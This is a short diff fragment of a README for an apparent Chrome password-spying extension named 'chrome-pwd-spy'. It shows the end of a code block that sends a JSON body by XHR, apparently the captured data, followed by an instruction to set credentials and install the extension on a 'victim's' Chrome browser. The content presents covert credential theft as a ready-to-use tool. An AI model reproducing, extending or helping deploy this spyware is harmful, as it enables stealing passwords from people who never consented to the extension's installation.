vstostap/chrome-pwd-spy/README.md

  xhr.send(JSON.stringify(body));
 ```

-Set your mandrill credentials, then install extension on your victim's chrome browser and that's it!
+Set your credentials, then install extension on your victim's chrome browser and that's it!